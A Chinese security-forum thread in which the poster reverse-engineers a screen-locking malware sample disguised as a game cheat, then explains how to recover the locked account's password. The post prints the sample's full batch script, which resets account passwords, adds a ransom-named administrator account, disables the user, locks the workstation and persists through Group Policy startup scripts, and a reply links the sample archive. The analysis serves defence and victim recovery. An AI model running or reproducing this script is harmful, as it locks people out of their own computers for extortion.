吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 17989|回复: 51
收起左侧

[PC样本分析] 记一次破解简单的锁机恶意程序

  [复制链接]
911061873 发表于 2018-2-21 20:38
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 911061873 于 2018-2-21 20:40 编辑

关键字:英魂之刃全图辅助_内部定制版




两天有个小弟来求助,说电脑被锁了,并且发来了一个锁电脑的程序。
Windows 7 x64-2018-02-21-20-09-37.png
虚拟机中测试了下如图。
Windows 7 x64-2018-02-21-20-09-51.png
恢复以前的快照,开始对程序动手
用OD载入,查字符串。
Windows 7 x64-2018-02-21-20-15-53.png
像这种锁机程序一般都是用CMD命令对系统帐户进行操作,果然在字符串里面找到了一个“cmd.exe /c”。
Windows 7 x64-2018-02-21-20-17-34.png
跟进去,然后F2下断点,F9运行起来,程序停到断点的地方了。
Windows 7 x64-2018-02-21-20-22-41.png
F7单步运行一下,发现有一个文件路径入栈,是临时目录里面的一个批处理文件。
Windows 7 x64-2018-02-21-20-22-57.png
打开临时目录,设置系统隐藏文件可见,就看到了这个批处理。
Windows 7 x64-2018-02-21-20-25-25.png
查看批处理的内容
Windows 7 x64-2018-02-21-20-25-36.png
[Bash shell] 纯文本查看 复制代码
@shift
 set opw=lzj_
 set rnum=%random%
 set npw=%opw%%rnum:~-2%%rnum:~-3%
 net user administrator %npw% &
 net user Administrator %npw% &
 net user %username% %npw% &
 net user 要密码加QQ360665490 %npw% /add &
 net user  aeon%rnum% %npw% /add &
 net localgroup administrators 要密码加QQ360665490 /add &
 net localgroup administrators aeon%rnum% /add &
 net user %username% /active:no &
 net user 要密码加QQ360665490 /active:yes &
 net user aeon%rnum% /active:yes &
 rundll32.exe user32.dll,LockWorkStation &
 copy %0 C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup /y  &&
 echo [Startup]>C:\Windows\System32\GroupPolicy\Machine\Scripts\scripts.ini  &&
 echo 0CmdLine=%~nx0>>C:\Windows\System32\GroupPolicy\Machine\Scripts\scripts.ini &&
 echo 0Parameters=>>C:\Windows\System32\GroupPolicy\Machine\Scripts\scripts.ini


到这里,帐户名和密码就已经知道了。
密码是“lzj_”加上有一个前缀为“aeon”的帐户后面五位随机数的后两位和后三位。
例如随机数是“12345”,则密码为“lzj_45345”

免费评分

参与人数 24威望 +1 吾爱币 +31 热心值 +22 收起 理由
a3636326 + 1 + 1 用心讨论,共获提升!
逄不怪 + 1 谢谢@Thanks!
liphily + 2 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
小红 + 2 + 1 我很赞同!
SuperF + 1 + 1 用心讨论,共获提升!
gjstws + 1 + 1 谢谢@Thanks!
?﹏從此沉默 + 1 + 1 我很赞同!
Tim-52Pojie + 1 + 1 谢谢@Thanks!
qqju + 1 + 1 我很赞同!
touhoufans + 1 + 1 用心讨论,共获提升!
衣柜里的男人 + 1 我很赞同!
寂寞-孤独i + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
若白 + 1 + 1 感谢,吾爱破解论坛因你更精彩!
yeweidan + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
boycwb + 1 + 1 谢谢@Thanks!
Hmily + 1 + 10 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
andywith + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
dwq308 + 1 + 1 热心回复!
WGT + 1 + 1 谢谢@Thanks!
噬魂丶魂殇 + 1 用心讨论,共获提升!
bubbletea + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
shelovesi + 1 + 1 鼓励转贴优秀软件安全工具和文档!
Johnny.Y + 1 + 1 谢谢@Thanks!
楠哥小迷弟 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

52pojiee 发表于 2018-2-22 11:57
所以密码应该是 lzj_52952吗?
 楼主| 911061873 发表于 2018-2-22 10:45
WGT 发表于 2018-2-21 22:18
net user  aeon%rnum% %npw% /add & 他这里这么写是什么效果?

set opw=lzj_

set rnum=%random%  #rnum等于随机数
set npw=%opw%%rnum:~-2%%rnum:~-3%  #npm等于变量opw加上随机数的后两位再加上随机数后三位

net user aeon%rnum% %npw% /add &  #这句话就是添加了一个用户名为“aeon加随机数”的用户。

 楼主| 911061873 发表于 2018-2-21 20:42
锁机程序在这里
英魂之刃全图辅助_内部定制版.rar (49.75 KB, 下载次数: 93)
浪涛依旧在 发表于 2018-2-21 20:58
哇  楼主棒棒哒,我是最近开始学习OD的,这样的帖子对我来说像营养快线多谢楼主了
shelovesi 发表于 2018-2-21 21:01
还有这种骚套路~~膜拜膜拜
popddos 发表于 2018-2-21 21:06
居然还有这么下流的作者。
byh3025 发表于 2018-2-21 21:09
哦,一个系统密码
噬魂丶魂殇 发表于 2018-2-21 21:16
谢谢楼主分享
似若尘埃 发表于 2018-2-21 21:18
感谢楼主分享!
迷雾 发表于 2018-2-21 21:25
这肯定小学生弄的
鼠窜之徒 发表于 2018-2-21 21:28
你怎么知道是临时目录,没讲清楚,教程白搭
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-28 05:46

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表